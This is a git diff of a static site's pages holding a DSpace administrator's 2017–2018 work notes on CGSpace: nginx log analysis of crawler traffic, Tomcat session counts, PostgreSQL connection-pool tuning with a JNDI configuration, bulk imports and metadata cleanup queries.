    • @@ -786,7 +786,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
    • Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM
    • The logs don’t show anything particularly abnormal between those hours:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "22/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "22/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         136 31.6.77.23
         174 68.180.229.254
         217 66.249.66.91
    @@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM
  • I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          88 66.249.66.91
         140 68.180.229.254
         155 54.196.2.131
    @@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
    • … and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "23/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           5 190.120.6.219
           6 104.198.9.108
          14 104.196.152.243
    @@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • These IPs crawling the REST API don’t specify user agents and I’d assume they are creating many Tomcat sessions
  • I would catch them in nginx to assign a “bot” user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they seem to create any really — at least not in the dspace.log:
  • -
    $ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2
     
    • I’m wondering if REST works differently, or just doesn’t log these sessions?
    • @@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
    • In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)
    • I also noticed that CGNET appears to be monitoring the old domain every few minutes:
    -
    192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
    +
    192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] "HEAD / HTTP/1.1" 301 0 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
     
    • I should probably tell CGIAR people to have CGNET stop that
    @@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
  • Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM
  • Yet another mystery because the load for all domains looks fine at that time:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "26/Nov/2017:0[567]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "26/Nov/2017:0[567]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         190 66.249.66.83
         195 104.196.152.243
         220 40.77.167.82
    @@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • About an hour later Uptime Robot said that the server was down
  • Here are all the top XMLUI and REST users from today:
  • -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "29/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "29/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         540 66.249.66.83
         659 40.77.167.36
         663 157.55.39.214
    @@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
     
  • I don’t see much activity in the logs but there are 87 PostgreSQL connections
  • But shit, there were 10,000 unique Tomcat sessions today:
  • -
    $ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     10037
     
    • Although maybe that’s not much, as the previous two days had more:
    -
    $ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     12377
    -$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     16984
     
    • I think we just need start increasing the number of allowed PostgreSQL connections instead of fighting this, as it’s the most common source of crashes we have
    • diff --git a/docs/2017-12/index.html b/docs/2017-12/index.html index 7a6f097bd..6f08d9fa7 100644 --- a/docs/2017-12/index.html +++ b/docs/2017-12/index.html @@ -30,7 +30,7 @@ The logs say “Timeout waiting for idle object” PostgreSQL activity says there are 115 connections currently The list of connections to XMLUI and REST API for today: "/> - + @@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
    • PostgreSQL activity says there are 115 connections currently
    • The list of connections to XMLUI and REST API for today:
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         763 2.86.122.76
         907 207.46.13.94
        1018 157.55.39.206
    @@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
     
    • The number of DSpace sessions isn’t even that high:
    -
    $ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     5815
     
    • Connections in the last two hours:
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017:(09|10)" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail                                                      
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017:(09|10)" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail                                                      
          78 93.160.60.22
         101 40.77.167.122
         113 66.249.66.70
    @@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
     
  • What the fuck is going on?
  • I’ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:
  • -
    $ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     822
     
    • Appears to be some new bot:
    -
    2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] "GET /handle/10568/78444?show=full HTTP/1.1" 200 29307 "-" "Mozilla/3.0 (compatible; Indy Library)"
    +
    2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] "GET /handle/10568/78444?show=full HTTP/1.1" 200 29307 "-" "Mozilla/3.0 (compatible; Indy Library)"
     
    • I restarted Tomcat and everything came back up
    • I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx
    • I will also add ‘Drupal’ to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots
    -
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log  /var/log/nginx/rest.log.1  /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "1/Dec/2017" | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           3 54.75.205.145
           6 70.32.83.92
          14 2a01:7e00::f03c:91ff:fe18:7396
    @@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
     
  • I don’t see any errors in the DSpace logs but I see in nginx’s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)
  • Looking at the REST API logs I see some new client IP I haven’t noticed before:
  • -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "6/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "6/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          18 95.108.181.88
          19 68.180.229.254
          30 207.46.13.151
    @@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
     
  • I looked just now and see that there are 121 PostgreSQL connections!
  • The top users right now are:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "7/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail 
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "7/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail 
         838 40.77.167.11
         939 66.249.66.223
        1149 66.249.66.206
    @@ -247,7 +247,7 @@ The list of connections to XMLUI and REST API for today:
     
    • It is responsible for 4,500 Tomcat sessions today alone:
    -
    $ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     4574
     
    • I’ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it’s the same bot on the same subnet
    • @@ -255,8 +255,8 @@ The list of connections to XMLUI and REST API for today:
    $ /home/cgspace.cgiar.org/bin/dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(144666) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(144666) is still referenced from table "bundle".
     
    • The solution is like I discovered in 2017-04, to set the primary_bitstream_id to null:
    @@ -294,12 +294,12 @@ UPDATE 1
  • I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the collection field)
  • -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &> /tmp/ccafs.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &> /tmp/ccafs.log
     
    • It’s the same on DSpace Test, I can’t import the SAF bundle without specifying the collection:
    $ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
    -No collections given. Assuming 'collections' file inside item directory
    +No collections given. Assuming 'collections' file inside item directory
     Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
     Generating mapfile: /tmp/ccafs.map
     Processing collections file: collections
    @@ -328,7 +328,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted that CGSpace was using high CPU from 4 to 6 PM
  • The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         671 66.249.66.70
         885 95.108.181.88
         904 157.55.39.96
    @@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
     
    • And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          33 68.180.229.254
          48 157.55.39.96
          51 157.55.39.179
    @@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted this morning that there was high outbound traffic from 6 to 8 AM
  • The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         190 207.46.13.146
         191 197.210.168.174
         202 86.101.203.216
    @@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
     
    • On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           7 104.198.9.108
           8 185.29.8.111
           8 40.77.167.176
    @@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
     
  • Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM
  • The REST and OAI API logs look pretty much the same as earlier this morning, but there’s a new IP harvesting XMLUI:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail            
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "18/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail            
         360 95.108.181.88
         477 66.249.66.90
         526 86.101.203.216
    @@ -420,13 +420,13 @@ Elapsed time: 2 secs (2559 msecs)
     
    • Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:
    -
    $ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                          
    +
    $ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                          
     1
     
    • I guess there’s nothing I can do to them for now
    • In other news, I am curious how many PostgreSQL connection pool errors we’ve had in the last month:
    -
    $ grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-1* | grep -v :0
    +
    $ grep -c "Cannot get a connection, pool error Timeout waiting for idle object" dspace.log.2017-1* | grep -v :0
     dspace.log.2017-11-07:15695
     dspace.log.2017-11-08:135
     dspace.log.2017-11-17:1298
    @@ -476,7 +476,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
     
  • I re-deployed the 5_x-prod branch on CGSpace, applied all system updates, and restarted the server
  • Looking through the dspace.log I see this error:
  • -
    2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
    +
    2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
     
    • I don’t have time now to look into this but the Solr sharding has long been an issue!
    • Looking into using JDBC / JNDI to provide a database pool to DSpace
    • @@ -484,23 +484,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
    • First, I uncomment db.jndi in dspace/config/dspace.cfg
    • Then I create a global Resource in the main Tomcat server.xml (inside GlobalNamingResources):
    -
    <Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
    -	  driverClassName="org.postgresql.Driver"
    -	  url="jdbc:postgresql://localhost:5432/dspace"
    -	  username="dspace"
    -	  password="dspace"
    -      initialSize='5'
    -      maxActive='50'
    -      maxIdle='15'
    -      minIdle='5'
    -      maxWait='5000'
    -      validationQuery='SELECT 1'
    -      testOnBorrow='true' />
    +
    <Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
    +	  driverClassName="org.postgresql.Driver"
    +	  url="jdbc:postgresql://localhost:5432/dspace"
    +	  username="dspace"
    +	  password="dspace"
    +      initialSize='5'
    +      maxActive='50'
    +      maxIdle='15'
    +      minIdle='5'
    +      maxWait='5000'
    +      validationQuery='SELECT 1'
    +      testOnBorrow='true' />
     
    -
    <ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
    +
    <ResourceLink global="jdbc/dspace" name="jdbc/dspace" type="javax.sql.DataSource"/>
     
    • I am not sure why several guides show configuration snippets for server.xml and web application contexts that use a Local and Global jdbc…
    • When DSpace can’t find the JNDI context (for whatever reason) you will see this in the dspace logs:
    • @@ -535,11 +535,11 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
    • And indeed the Catalina logs show that it failed to set up the JDBC driver:
    -
    org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
    +
    org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class 'org.postgresql.Driver'
     
    • There are several copies of the PostgreSQL driver installed by DSpace:
    -
    $ find ~/dspace/ -iname "postgresql*jdbc*.jar"
    +
    $ find ~/dspace/ -iname "postgresql*jdbc*.jar"
     /Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
     /Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
     /Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
    @@ -561,8 +561,8 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
     
  • Oh that’s fantastic, now at least Tomcat doesn’t print an error during startup so I guess it succeeds to create the JNDI pool
  • DSpace starts up but I have no idea if it’s using the JNDI configuration because I see this in the logs:
  • -
    2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
    -2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
    +
    2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is '{}'PostgreSQL
    +2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is '{}'9.5.10
     2017-12-19 13:26:54,293 INFO  org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
     2017-12-19 13:26:54,306 INFO  org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
     
      @@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
    • There are short bursts of connections up to 10, but it generally stays around 5
    • Test and import 13 records to CGSpace for Abenet:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &> systemoffice.log
     
    • The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.
    • @@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
    • Linode alerted that CGSpace was using high CPU this morning around 6 AM
    • I’m playing with reading all of a month’s nginx logs into goaccess:
    -
    # find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | goaccess --log-format=COMBINED -
    +
    # find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | goaccess --log-format=COMBINED -
     
    • I can see interesting things using this approach, for example:
        @@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
        • Looking at some old notes for metadata to clean up, I found a few hundred corrections in cg.fulltextstatus and dc.language.iso:
        -
        # update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
        +
        # update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
         UPDATE 5
        -# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
        +# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
         DELETE 17
        -# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
        +# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
         UPDATE 49
        -# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
        +# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
         UPDATE 4
        -# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
        +# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
         UPDATE 16
        -# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
        +# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
         UPDATE 9
        -# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
        +# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
         UPDATE 1
        -# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
        +# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
         UPDATE 5
        -# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
        +# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
         DELETE 20
         
        • I need to figure out why we have records with language in because that’s not a language!
        • @@ -735,7 +735,7 @@ DELETE 20
        • Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM
        • Here’s the XMLUI logs:
        -
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "30/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        +
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "30/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
             637 207.46.13.106
             641 157.55.39.186
             715 68.180.229.254
        @@ -751,7 +751,7 @@ DELETE 20
         
      • They identify as “com.plumanalytics”, which Google says is associated with Elsevier
      • They only seem to have used one Tomcat session so that’s good, I guess I don’t need to add them to the Tomcat Crawler Session Manager valve:
      -
      $ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l          
      +
      $ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l          
       1 
       
      • 216.244.66.245 seems to be moz.com’s DotBot
      • diff --git a/docs/2018-01/index.html b/docs/2018-01/index.html index 10c83907d..15b667798 100644 --- a/docs/2018-01/index.html +++ b/docs/2018-01/index.html @@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don& I notice this error quite a few times in dspace.log: 2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32. And there are many of these errors every day for the past month: -$ grep -c "Error while searching for sidebar facets" dspace.log.* +$ grep -c "Error while searching for sidebar facets" dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don& I notice this error quite a few times in dspace.log: 2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32. +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32. And there are many of these errors every day for the past month: -$ grep -c "Error while searching for sidebar facets" dspace.log.* +$ grep -c "Error while searching for sidebar facets" dspace.log.* dspace.log.2017-11-21:4 dspace.log.2017-11-22:1 dspace.log.2017-11-23:4 @@ -150,7 +150,7 @@ dspace.log.2018-01-02:34 Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains "/> - + @@ -252,11 +252,11 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
      • I notice this error quite a few times in dspace.log:
